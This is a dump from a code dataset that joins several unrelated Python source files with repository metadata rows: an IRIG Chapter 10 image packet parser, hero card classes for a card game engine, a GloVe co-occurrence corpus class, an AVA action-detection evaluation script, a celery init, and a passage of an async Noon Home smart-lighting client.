packet.Packet.__init__(self, *args, **kwargs)
if self.iph:
self.Message.FORMAT = BitFormat('u64 ipts')
class ImageF1(packet.Packet):
"""Still imagery
.. py:attribute:: format
* 0 - MIL-STD-2500 National Imagery Transmission Format
* 1 - JPEG File Interchange Format
* 2 - JPEG 2000 (ISO/IEC 154444-1)
* 3 - Portable Network Graphics Format (PNG)
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Contains less than one complete image
* 1 - Contains one complete image
* 2 - Contains multiple complete images
* 3 - Contains multiple incomplete messages
.. py:attribute:: parts
* 0 - Doesn't contain first or last segment of the image
* 1 - Contains first segment of image
* 2 - Contains multiple complete messages
* 3 - Contains both first and last segment of image
"""
csdw_format = BitFormat('''
p23
u4 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
.. py:attribute:: length
Length of image or segment (bytes)
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
class ImageF2(packet.Packet):
"""Dynamic Imagery
.. py:attribute:: format
Refer to chapter 10 standard
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Contains less than one complete image (segment)
* 1 - Contains one complete image
* 2 - Contains multiple complete images
.. py:attribute:: parts
* 0 - Doesn't contain first or last segment of the image
* 1 - Contains first segment of image
* 2 - Contains last segment of image
"""
csdw_format = BitFormat('''
p21
u6 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
.. py:attribute:: length
Length of image or segment (bytes)
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
| 23.912752
| 78
| 0.572551
|
from .util import BitFormat
from . import packet
__all__ = ('ImageF0', 'ImageF1', 'ImageF2')
class ImageMessage:
def __repr__(self):
return '<Image Segment>'
class ImageF0(packet.Packet):
csdw_format = BitFormat('''
u27 length
u1 iph
u3 sum
u3 parts''')
class Message(packet.Message, ImageMessage):
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
if self.iph:
self.Message.FORMAT = BitFormat('u64 ipts')
class ImageF1(packet.Packet):
csdw_format = BitFormat('''
p23
u4 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
class ImageF2(packet.Packet):
csdw_format = BitFormat('''
p21
u6 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
| true
| true
|
f70524fefa5302b732e4c8435ba2d80c5c960673
| 3,066
|
py
|
Python
|
SDWLE/cards_copy/heroes.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
SDWLE/cards_copy/heroes.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
SDWLE/cards_copy/heroes.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
from SDWLE.cards.base import HeroCard
from SDWLE.constants import CHARACTER_CLASS, MINION_TYPE
from SDWLE.powers import MagePower, DruidPower, HunterPower, PaladinPower, PriestPower, RoguePower,\
ShamanPower, WarlockPower, WarriorPower, JaraxxusPower, DieInsect
class Malfurion(HeroCard):
def __init__(self):
super().__init__("Malfurion Stormrage", CHARACTER_CLASS.DRUID, 30, DruidPower)
class Rexxar(HeroCard):
def __init__(self):
super().__init__("Rexxar", CHARACTER_CLASS.HUNTER, 30, HunterPower)
class Jaina(HeroCard):
def __init__(self):
super().__init__("Jaina Proudmoore", CHARACTER_CLASS.MAGE, 30, MagePower)
class Uther(HeroCard):
def __init__(self):
super().__init__("Uther the Lightbringer", CHARACTER_CLASS.PALADIN, 30, PaladinPower)
class Anduin(HeroCard):
def __init__(self):
super().__init__("Anduin Wrynn", CHARACTER_CLASS.PRIEST, 30, PriestPower)
class Valeera(HeroCard):
def __init__(self):
super().__init__("Valeera Sanguinar", CHARACTER_CLASS.ROGUE, 30, RoguePower)
class Thrall(HeroCard):
def __init__(self):
super().__init__("Thrall", CHARACTER_CLASS.SHAMAN, 30, ShamanPower)
class Guldan(HeroCard):
def __init__(self):
super().__init__("Gul'dan", CHARACTER_CLASS.WARLOCK, 30, WarlockPower)
class Garrosh(HeroCard):
def __init__(self):
super().__init__("Garrosh Hellscream", CHARACTER_CLASS.WARRIOR, 30, WarriorPower)
class Jaraxxus(HeroCard):
def __init__(self):
super().__init__("Lord Jaraxxus", CHARACTER_CLASS.WARLOCK, 15, JaraxxusPower, MINION_TYPE.DEMON,
ref_name="Lord Jarraxus (hero)")
class Ragnaros(HeroCard):
def __init__(self):
super().__init__("Ragnaros the Firelord (hero)", CHARACTER_CLASS.ALL, 8, DieInsect)
def hero_for_class(character_class):
if character_class == CHARACTER_CLASS.DRUID:
return Malfurion()
elif character_class == CHARACTER_CLASS.HUNTER:
return Rexxar()
elif character_class == CHARACTER_CLASS.MAGE:
return Jaina()
elif character_class == CHARACTER_CLASS.PRIEST:
return Anduin()
elif character_class == CHARACTER_CLASS.PALADIN:
return Uther()
elif character_class == CHARACTER_CLASS.ROGUE:
return Valeera()
elif character_class == CHARACTER_CLASS.SHAMAN:
return Thrall()
elif character_class == CHARACTER_CLASS.WARLOCK:
return Guldan()
elif character_class == CHARACTER_CLASS.WARRIOR:
return Garrosh()
else:
return Jaina()
__hero_lookup = {"Jaina": Jaina,
"Malfurion": Malfurion,
"Rexxar": Rexxar,
"Anduin": Anduin,
"Uther": Uther,
"Gul'dan": Guldan,
"Valeera": Valeera,
"Thrall": Thrall,
"Garrosh": Garrosh,
"Jaraxxus": Jaraxxus,
"Ragnaros": Ragnaros,
}
def hero_from_name(name):
return __hero_lookup[name]()
| 30.356436
| 104
| 0.660144
|
from SDWLE.cards.base import HeroCard
from SDWLE.constants import CHARACTER_CLASS, MINION_TYPE
from SDWLE.powers import MagePower, DruidPower, HunterPower, PaladinPower, PriestPower, RoguePower,\
ShamanPower, WarlockPower, WarriorPower, JaraxxusPower, DieInsect
class Malfurion(HeroCard):
def __init__(self):
super().__init__("Malfurion Stormrage", CHARACTER_CLASS.DRUID, 30, DruidPower)
class Rexxar(HeroCard):
def __init__(self):
super().__init__("Rexxar", CHARACTER_CLASS.HUNTER, 30, HunterPower)
class Jaina(HeroCard):
def __init__(self):
super().__init__("Jaina Proudmoore", CHARACTER_CLASS.MAGE, 30, MagePower)
class Uther(HeroCard):
def __init__(self):
super().__init__("Uther the Lightbringer", CHARACTER_CLASS.PALADIN, 30, PaladinPower)
class Anduin(HeroCard):
def __init__(self):
super().__init__("Anduin Wrynn", CHARACTER_CLASS.PRIEST, 30, PriestPower)
class Valeera(HeroCard):
def __init__(self):
super().__init__("Valeera Sanguinar", CHARACTER_CLASS.ROGUE, 30, RoguePower)
class Thrall(HeroCard):
def __init__(self):
super().__init__("Thrall", CHARACTER_CLASS.SHAMAN, 30, ShamanPower)
class Guldan(HeroCard):
def __init__(self):
super().__init__("Gul'dan", CHARACTER_CLASS.WARLOCK, 30, WarlockPower)
class Garrosh(HeroCard):
def __init__(self):
super().__init__("Garrosh Hellscream", CHARACTER_CLASS.WARRIOR, 30, WarriorPower)
class Jaraxxus(HeroCard):
def __init__(self):
super().__init__("Lord Jaraxxus", CHARACTER_CLASS.WARLOCK, 15, JaraxxusPower, MINION_TYPE.DEMON,
ref_name="Lord Jarraxus (hero)")
class Ragnaros(HeroCard):
def __init__(self):
super().__init__("Ragnaros the Firelord (hero)", CHARACTER_CLASS.ALL, 8, DieInsect)
def hero_for_class(character_class):
if character_class == CHARACTER_CLASS.DRUID:
return Malfurion()
elif character_class == CHARACTER_CLASS.HUNTER:
return Rexxar()
elif character_class == CHARACTER_CLASS.MAGE:
return Jaina()
elif character_class == CHARACTER_CLASS.PRIEST:
return Anduin()
elif character_class == CHARACTER_CLASS.PALADIN:
return Uther()
elif character_class == CHARACTER_CLASS.ROGUE:
return Valeera()
elif character_class == CHARACTER_CLASS.SHAMAN:
return Thrall()
elif character_class == CHARACTER_CLASS.WARLOCK:
return Guldan()
elif character_class == CHARACTER_CLASS.WARRIOR:
return Garrosh()
else:
return Jaina()
__hero_lookup = {"Jaina": Jaina,
"Malfurion": Malfurion,
"Rexxar": Rexxar,
"Anduin": Anduin,
"Uther": Uther,
"Gul'dan": Guldan,
"Valeera": Valeera,
"Thrall": Thrall,
"Garrosh": Garrosh,
"Jaraxxus": Jaraxxus,
"Ragnaros": Ragnaros,
}
def hero_from_name(name):
return __hero_lookup[name]()
| true
| true
|
f705257c65c84a3ef53edac3abe051b1978185f8
| 2,667
|
py
|
Python
|
glove/corpus.py
|
thibaultprouteau/glove-python
|
749494290fdfd24379dcc2e244c583ee61808634
|
[
"Apache-2.0"
] | 1,148
|
2015-01-01T02:27:31.000Z
|
2022-03-31T17:16:05.000Z
|
glove/corpus.py
|
thibaultprouteau/glove-python
|
749494290fdfd24379dcc2e244c583ee61808634
|
[
"Apache-2.0"
] | 78
|
2015-01-01T10:18:54.000Z
|
2021-08-06T06:53:24.000Z
|
glove/corpus.py
|
thibaultprouteau/glove-python
|
749494290fdfd24379dcc2e244c583ee61808634
|
[
"Apache-2.0"
] | 352
|
2015-01-02T06:01:17.000Z
|
2022-03-22T12:21:51.000Z
|
# Cooccurrence matrix construction tools
# for fitting the GloVe model.
import numpy as np
try:
# Python 2 compat
import cPickle as pickle
except ImportError:
import pickle
from .corpus_cython import construct_cooccurrence_matrix
class Corpus(object):
"""
Class for constructing a cooccurrence matrix
from a corpus.
A dictionry mapping words to ids can optionally
be supplied. If left None, it will be constructed
from the corpus.
"""
def __init__(self, dictionary=None):
self.dictionary = {}
self.dictionary_supplied = False
self.matrix = None
if dictionary is not None:
self._check_dict(dictionary)
self.dictionary = dictionary
self.dictionary_supplied = True
def _check_dict(self, dictionary):
if (np.max(list(dictionary.values())) != (len(dictionary) - 1)):
raise Exception('The largest id in the dictionary '
'should be equal to its length minus one.')
if np.min(list(dictionary.values())) != 0:
raise Exception('Dictionary ids should start at zero')
def fit(self, corpus, window=10, ignore_missing=False):
"""
Perform a pass through the corpus to construct
the cooccurrence matrix.
Parameters:
- iterable of lists of strings corpus
- int window: the length of the (symmetric)
context window used for cooccurrence.
- bool ignore_missing: whether to ignore words missing from
the dictionary (if it was supplied).
Context window distances will be preserved
even if out-of-vocabulary words are
ignored.
If False, a KeyError is raised.
"""
self.matrix = construct_cooccurrence_matrix(corpus,
self.dictionary,
int(self.dictionary_supplied),
int(window),
int(ignore_missing))
def save(self, filename):
with open(filename, 'wb') as savefile:
pickle.dump((self.dictionary, self.matrix),
savefile,
protocol=pickle.HIGHEST_PROTOCOL)
@classmethod
def load(cls, filename):
instance = cls()
with open(filename, 'rb') as savefile:
instance.dictionary, instance.matrix = pickle.load(savefile)
return instance
| 32.52439
| 82
| 0.558305
|
import numpy as np
try:
import cPickle as pickle
except ImportError:
import pickle
from .corpus_cython import construct_cooccurrence_matrix
class Corpus(object):
def __init__(self, dictionary=None):
self.dictionary = {}
self.dictionary_supplied = False
self.matrix = None
if dictionary is not None:
self._check_dict(dictionary)
self.dictionary = dictionary
self.dictionary_supplied = True
def _check_dict(self, dictionary):
if (np.max(list(dictionary.values())) != (len(dictionary) - 1)):
raise Exception('The largest id in the dictionary '
'should be equal to its length minus one.')
if np.min(list(dictionary.values())) != 0:
raise Exception('Dictionary ids should start at zero')
def fit(self, corpus, window=10, ignore_missing=False):
self.matrix = construct_cooccurrence_matrix(corpus,
self.dictionary,
int(self.dictionary_supplied),
int(window),
int(ignore_missing))
def save(self, filename):
with open(filename, 'wb') as savefile:
pickle.dump((self.dictionary, self.matrix),
savefile,
protocol=pickle.HIGHEST_PROTOCOL)
@classmethod
def load(cls, filename):
instance = cls()
with open(filename, 'rb') as savefile:
instance.dictionary, instance.matrix = pickle.load(savefile)
return instance
| true
| true
|
f7052ac37e1c8ecd7b7eb4f960efd1bcda7a3958
| 8,320
|
py
|
Python
|
action-baseline/evaluation/get_ava_performance.py
|
leaderj1001/Action-Localization
|
04d972e6dc3c07d347c70893723d91487c1c8cbd
|
[
"MIT"
] | 24
|
2019-07-10T15:13:27.000Z
|
2021-07-08T12:12:40.000Z
|
action-baseline/evaluation/get_ava_performance.py
|
leaderj1001/Action-Localization
|
04d972e6dc3c07d347c70893723d91487c1c8cbd
|
[
"MIT"
] | 7
|
2019-10-06T12:22:04.000Z
|
2020-04-15T13:14:10.000Z
|
action-baseline/evaluation/get_ava_performance.py
|
leaderj1001/Action-Localization
|
04d972e6dc3c07d347c70893723d91487c1c8cbd
|
[
"MIT"
] | 4
|
2019-10-31T09:01:15.000Z
|
2021-03-26T04:20:21.000Z
|
r"""Compute action detection performance for the AVA dataset.
Please send any questions about this code to the Google Group ava-dataset-users:
https://groups.google.com/forum/#!forum/ava-dataset-users
Example usage:
python -O get_ava_performance.py \
-l ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt \
-g ava_val_v2.1.csv \
-e ava_val_excluded_timestamps_v2.1.csv \
-d your_results.csv
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from collections import defaultdict
import csv
import heapq
import logging
import pprint
import sys
import time
import numpy as np
from evaluation.ava import object_detection_evaluation
from evaluation.ava import standard_fields
def print_time(message, start):
logging.info("==> %g seconds to %s", time.time() - start, message)
def make_image_key(video_id, timestamp):
"""Returns a unique identifier for a video id & timestamp."""
return "%s,%04d" % (video_id, int(timestamp))
def read_csv(csv_file, class_whitelist=None, capacity=0):
"""Loads boxes and class labels from a CSV file in the AVA format.
CSV file format described at https://research.google.com/ava/download.html.
Args:
csv_file: A file object.
class_whitelist: If provided, boxes corresponding to (integer) class labels
not in this set are skipped.
capacity: Maximum number of labeled boxes allowed for each example.
Default is 0 where there is no limit.
Returns:
boxes: A dictionary mapping each unique image key (string) to a list of
boxes, given as coordinates [y1, x1, y2, x2].
labels: A dictionary mapping each unique image key (string) to a list of
integer class lables, matching the corresponding box in `boxes`.
scores: A dictionary mapping each unique image key (string) to a list of
score values lables, matching the corresponding label in `labels`. If
scores are not provided in the csv, then they will default to 1.0.
"""
start = time.time()
entries = defaultdict(list)
boxes = defaultdict(list)
labels = defaultdict(list)
scores = defaultdict(list)
reader = csv.reader(csv_file)
for row in reader:
assert len(row) in [7, 8], "Wrong number of columns: " + row
image_key = make_image_key(row[0], row[1])
x1, y1, x2, y2 = [float(n) for n in row[2:6]]
action_id = int(row[6])
if class_whitelist and action_id not in class_whitelist:
continue
score = 1.0
if len(row) == 8:
score = float(row[7])
if capacity < 1 or len(entries[image_key]) < capacity:
heapq.heappush(entries[image_key],
(score, action_id, y1, x1, y2, x2))
elif score > entries[image_key][0][0]:
heapq.heapreplace(entries[image_key],
(score, action_id, y1, x1, y2, x2))
for image_key in entries:
# Evaluation API assumes boxes with descending scores
entry = sorted(entries[image_key], key=lambda tup: -tup[0])
for item in entry:
score, action_id, y1, x1, y2, x2 = item
boxes[image_key].append([y1, x1, y2, x2])
labels[image_key].append(action_id)
scores[image_key].append(score)
print_time("read file " + csv_file.name, start)
return boxes, labels, scores
def read_exclusions(exclusions_file):
"""Reads a CSV file of excluded timestamps.
Args:
exclusions_file: A file object containing a csv of video-id,timestamp.
Returns:
A set of strings containing excluded image keys, e.g. "aaaaaaaaaaa,0904",
or an empty set if exclusions file is None.
"""
excluded = set()
if exclusions_file:
reader = csv.reader(exclusions_file)
for row in reader:
assert len(row) == 2, "Expected only 2 columns, got: " + row
excluded.add(make_image_key(row[0], row[1]))
return excluded
def read_labelmap(labelmap_file):
"""Reads a labelmap without the dependency on protocol buffers.
Args:
labelmap_file: A file object containing a label map protocol buffer.
Returns:
labelmap: The label map in the form used by the object_detection_evaluation
module - a list of {"id": integer, "name": classname } dicts.
class_ids: A set containing all of the valid class id integers.
"""
labelmap = []
class_ids = set()
name = ""
class_id = ""
for line in labelmap_file:
if line.startswith(" name:"):
name = line.split('"')[1]
elif line.startswith(" id:") or line.startswith(" label_id:"):
class_id = int(line.strip().split(" ")[-1])
labelmap.append({"id": class_id, "name": name})
class_ids.add(class_id)
return labelmap, class_ids
def run_evaluation(labelmap, groundtruth, detections, exclusions):
"""Runs evaluations given input files.
Args:
labelmap: file object containing map of labels to consider, in pbtxt format
groundtruth: file object
detections: file object
exclusions: file object or None.
"""
categories, class_whitelist = read_labelmap(labelmap)
logging.info("CATEGORIES (%d):\n%s", len(categories),
pprint.pformat(categories, indent=2))
excluded_keys = read_exclusions(exclusions)
pascal_evaluator = object_detection_evaluation.PascalDetectionEvaluator(
categories)
# Reads the ground truth data.
boxes, labels, _ = read_csv(groundtruth, class_whitelist, 0)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in ground truth: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_ground_truth_image_info(
image_key, {
standard_fields.InputDataFields.groundtruth_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.InputDataFields.groundtruth_classes:
np.array(labels[image_key], dtype=int),
standard_fields.InputDataFields.groundtruth_difficult:
np.zeros(len(boxes[image_key]), dtype=bool)
})
print_time("convert groundtruth", start)
# Reads detections data.
boxes, labels, scores = read_csv(detections, class_whitelist, 50)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in detections: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_detected_image_info(
image_key, {
standard_fields.DetectionResultFields.detection_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.DetectionResultFields.detection_classes:
np.array(labels[image_key], dtype=int),
standard_fields.DetectionResultFields.detection_scores:
np.array(scores[image_key], dtype=float)
})
print_time("convert detections", start)
start = time.time()
metrics = pascal_evaluator.evaluate()
print_time("run_evaluator", start)
pprint.pprint(metrics, indent=2)
def parse_arguments():
"""Parses command-line flags.
Returns:
args: a named tuple containing three file objects args.labelmap,
args.groundtruth, and args.detections.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--labelmap",
help="Filename of label map",
type=argparse.FileType("r"),
default="./ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt")
parser.add_argument(
"-g",
"--groundtruth",
default='./ava_val_v2.2.csv',
help="CSV file containing ground truth.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-d",
"--detections",
default='results.csv',
help="CSV file containing inferred action detections.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-e",
"--exclusions",
help=("Optional CSV file containing videoid,timestamp pairs to exclude from evaluation."),
type=argparse.FileType("r"),
required=False)
return parser.parse_args()
def main():
logging.basicConfig(level=logging.INFO)
args = parse_arguments()
run_evaluation(**vars(args))
if __name__ == "__main__":
main()
| 33.548387
| 98
| 0.679688
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from collections import defaultdict
import csv
import heapq
import logging
import pprint
import sys
import time
import numpy as np
from evaluation.ava import object_detection_evaluation
from evaluation.ava import standard_fields
def print_time(message, start):
logging.info("==> %g seconds to %s", time.time() - start, message)
def make_image_key(video_id, timestamp):
return "%s,%04d" % (video_id, int(timestamp))
def read_csv(csv_file, class_whitelist=None, capacity=0):
start = time.time()
entries = defaultdict(list)
boxes = defaultdict(list)
labels = defaultdict(list)
scores = defaultdict(list)
reader = csv.reader(csv_file)
for row in reader:
assert len(row) in [7, 8], "Wrong number of columns: " + row
image_key = make_image_key(row[0], row[1])
x1, y1, x2, y2 = [float(n) for n in row[2:6]]
action_id = int(row[6])
if class_whitelist and action_id not in class_whitelist:
continue
score = 1.0
if len(row) == 8:
score = float(row[7])
if capacity < 1 or len(entries[image_key]) < capacity:
heapq.heappush(entries[image_key],
(score, action_id, y1, x1, y2, x2))
elif score > entries[image_key][0][0]:
heapq.heapreplace(entries[image_key],
(score, action_id, y1, x1, y2, x2))
for image_key in entries:
entry = sorted(entries[image_key], key=lambda tup: -tup[0])
for item in entry:
score, action_id, y1, x1, y2, x2 = item
boxes[image_key].append([y1, x1, y2, x2])
labels[image_key].append(action_id)
scores[image_key].append(score)
print_time("read file " + csv_file.name, start)
return boxes, labels, scores
def read_exclusions(exclusions_file):
excluded = set()
if exclusions_file:
reader = csv.reader(exclusions_file)
for row in reader:
assert len(row) == 2, "Expected only 2 columns, got: " + row
excluded.add(make_image_key(row[0], row[1]))
return excluded
def read_labelmap(labelmap_file):
labelmap = []
class_ids = set()
name = ""
class_id = ""
for line in labelmap_file:
if line.startswith(" name:"):
name = line.split('"')[1]
elif line.startswith(" id:") or line.startswith(" label_id:"):
class_id = int(line.strip().split(" ")[-1])
labelmap.append({"id": class_id, "name": name})
class_ids.add(class_id)
return labelmap, class_ids
def run_evaluation(labelmap, groundtruth, detections, exclusions):
categories, class_whitelist = read_labelmap(labelmap)
logging.info("CATEGORIES (%d):\n%s", len(categories),
pprint.pformat(categories, indent=2))
excluded_keys = read_exclusions(exclusions)
pascal_evaluator = object_detection_evaluation.PascalDetectionEvaluator(
categories)
# Reads the ground truth data.
boxes, labels, _ = read_csv(groundtruth, class_whitelist, 0)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in ground truth: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_ground_truth_image_info(
image_key, {
standard_fields.InputDataFields.groundtruth_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.InputDataFields.groundtruth_classes:
np.array(labels[image_key], dtype=int),
standard_fields.InputDataFields.groundtruth_difficult:
np.zeros(len(boxes[image_key]), dtype=bool)
})
print_time("convert groundtruth", start)
# Reads detections data.
boxes, labels, scores = read_csv(detections, class_whitelist, 50)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in detections: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_detected_image_info(
image_key, {
standard_fields.DetectionResultFields.detection_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.DetectionResultFields.detection_classes:
np.array(labels[image_key], dtype=int),
standard_fields.DetectionResultFields.detection_scores:
np.array(scores[image_key], dtype=float)
})
print_time("convert detections", start)
start = time.time()
metrics = pascal_evaluator.evaluate()
print_time("run_evaluator", start)
pprint.pprint(metrics, indent=2)
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--labelmap",
help="Filename of label map",
type=argparse.FileType("r"),
default="./ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt")
parser.add_argument(
"-g",
"--groundtruth",
default='./ava_val_v2.2.csv',
help="CSV file containing ground truth.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-d",
"--detections",
default='results.csv',
help="CSV file containing inferred action detections.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-e",
"--exclusions",
help=("Optional CSV file containing videoid,timestamp pairs to exclude from evaluation."),
type=argparse.FileType("r"),
required=False)
return parser.parse_args()
def main():
logging.basicConfig(level=logging.INFO)
args = parse_arguments()
run_evaluation(**vars(args))
if __name__ == "__main__":
main()
| true
| true
|
f7052b09a9ff46196bd8601792bc9ccca71459ca
| 192
|
py
|
Python
|
IdentityAccessManager/__init__.py
|
silop4all/iam
|
691316ca9ea7d3d10a3197b4d028e44e333c7060
|
[
"Apache-2.0"
] | 2
|
2018-02-27T20:51:08.000Z
|
2019-11-25T10:11:59.000Z
|
IdentityAccessManager/__init__.py
|
silop4all/iam
|
691316ca9ea7d3d10a3197b4d028e44e333c7060
|
[
"Apache-2.0"
] | null | null | null |
IdentityAccessManager/__init__.py
|
silop4all/iam
|
691316ca9ea7d3d10a3197b4d028e44e333c7060
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
| 32
| 55
| 0.786458
|
from __future__ import absolute_import
from .celery import app as celery_app
| true
| true
|
f7052baf507e53e8f68e20a709510cb920844c03
| 11,928
|
py
|
Python
|
aiopynoon/noon.py
|
alistairg/aiopynoon
|
f1340bd6a56de661e09f9f90fb28c331df2d5653
|
[
"MIT"
] | 1
|
2020-06-18T06:29:40.000Z
|
2020-06-18T06:29:40.000Z
|
aiopynoon/noon.py
|
alistairg/aiopynoon
|
f1340bd6a56de661e09f9f90fb28c331df2d5653
|
[
"MIT"
] | null | null | null |
aiopynoon/noon.py
|
alistairg/aiopynoon
|
f1340bd6a56de661e09f9f90fb28c331df2d5653
|
[
"MIT"
] | null | null | null |
import logging
import asyncio
from asyncio import CancelledError
from aiohttp import ClientSession, WSMsgType, ClientTimeout, WSServerHandshakeError
import json
import datetime
import traceback
import typing
from .const import (
LOGIN_URL,
DEX_URL,
Guid
)
from .space import NoonSpace
from .line import NoonLine
from .entity import NoonEntity
from .scene import NoonScene
from .exceptions import (
NoonAuthenticationError,
NoonUnknownError,
NoonProtocolError,
NoonDuplicateIdError
)
_LOGGER = logging.getLogger(__name__)
class Noon(object):
"""Base object for Noon Home."""
@property
async def spaces(self) -> typing.Dict[Guid, NoonSpace]:
if self._spaces is None:
await self._refreshDevices()
return self._spaces
@property
async def lines(self) -> typing.Dict[Guid, NoonLine]:
if self._lines is None:
await self._refreshDevices()
return self._lines
@property
def session(self) -> ClientSession:
return self._session
@property
def event_stream_connected(self) -> bool:
return self._event_stream_connected
@property
def event_stream_error(self) -> str:
return self._event_stream_error
def __init__(self, session, username, password):
"""Create a PyNoone object.
:param username: Noon username
:param password: Noon password
:returns PyNoon base object
"""
# Properties
self._spaces = None
self._lines = None
self._scenes = None
self._all_entities = {}
self._endpoints = {}
self._event_stream_connected = False
self._event_stream_error = None
# Store credentials
self._username = username
self._password = password
self._token = None
self._token_expires = None
# AIOHTTP
self._session = session
self._websocket_task = None
async def authenticate(self) -> bool:
"""Authenticate with Noon and store the authentication token."""
"""Reuse token if we have one."""
if self._token is not None and self._token_expires > datetime.datetime.now():
_LOGGER.debug("Using cached token, which should still be valid")
return True
""" Authenticate user, and get tokens """
_LOGGER.debug("No valid token or token expired. Authenticating...")
payload = {
"email": self._username,
"password": self._password
}
async with self.session.post(LOGIN_URL, json=payload) as login_response:
parsed_response = await login_response.json()
_LOGGER.debug("Response: {}".format(parsed_response))
# Invalid response from noon
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from authentication was not a dictionary")
raise NoonProtocolError
# Single error from noon
if "error" in parsed_response.keys():
raise NoonAuthenticationError
# Errors from Noon
if parsed_response.get("errors") is not None:
_LOGGER.error("Multiple authentication errors from Noon - {}".format(parsed_response["errors"]))
raise NoonUnknownError
# Must have a token and lifetime
try:
self._token = parsed_response["token"]
self._token_expires = datetime.datetime.now() + datetime.timedelta(seconds = (parsed_response["lifetime"]-30))
_LOGGER.debug("Got token from Noon. Expires at {}".format(self._token_expires))
except KeyError:
_LOGGER.error("Failed to get token or lifetime from {}".format(parsed_response))
raise NoonUnknownError
# Get endpoints if needed
await self._refreshEndpoints()
# Success
return True
async def open_eventstream(self, event_loop=None):
"""Create a background task for the event stream."""
if event_loop is None:
_LOGGER.debug("Using main asyncio event loop")
event_loop = asyncio.get_running_loop()
assert self._websocket_task is None or self._websocket_task.cancelled(), "Already running an event stream task"
self._websocket_task = event_loop.create_task(self._internal_eventstream())
async def close_eventstream(self):
"""Close the event stream background task."""
if self._websocket_task is not None and not self._websocket_task.cancelled():
_LOGGER.debug("Canceling websocket task")
self._websocket_task.cancel()
async def _internal_eventstream(self):
"""Loop for connecting to the Noon notification stream."""
keep_looping = True
while keep_looping:
try:
await self.authenticate()
timeout = ClientTimeout(total=8, connect=20, sock_connect=20, sock_read=8)
event_stream_url = "{}/api/notifications".format(self._endpoints["notification-ws"])
_LOGGER.debug("Connecting to notification stream...")
async with self.session.ws_connect(event_stream_url, timeout=timeout, heartbeat=60, headers={"Authorization": "Token {}".format(self._token)}) as ws:
_LOGGER.debug("Connected to notification stream")
self._event_stream_connected = True
self._event_stream_error = None
async for msg in ws:
if msg.type == WSMsgType.TEXT:
_LOGGER.debug("Got websocket message: {}".format(msg.data))
parsed_data = json.loads(msg.data)
changes = parsed_data["data"].get("changes", [])
for change in changes:
await self._handle_change(change)
elif msg.type == WSMsgType.CLOSED:
_LOGGER.error("Socket closed")
raise NoonProtocolError("Notification stream closed unexpectedly")
elif msg.type == WSMsgType.ERROR:
_LOGGER.error("Websocket error")
raise NoonProtocolError("Unknown error on notification stream")
except CancelledError:
_LOGGER.debug("Loop canceled.")
self._event_stream_error = "Canceled"
keep_looping = False
except WSServerHandshakeError:
_LOGGER.error("Loop Fatal: Handshake error")
self._event_stream_error = "Handshake Error"
keep_looping = False
except Exception:
_LOGGER.exception("Loop Fatal: Generic exception during event loop")
self._event_stream_error = "Unknown exception - {}".format(traceback.format_exc())
keep_looping = False
finally:
_LOGGER.debug("Event stream is disconnected.")
self._event_stream_connected = False
async def _handle_change(self, change):
"""Process a change notification."""
guid = change.get("guid", None)
if guid is None:
_LOGGER.error("Cannot process change - no GUID in {}".format(change))
return
affected_entity = self._all_entities.get(guid, None)
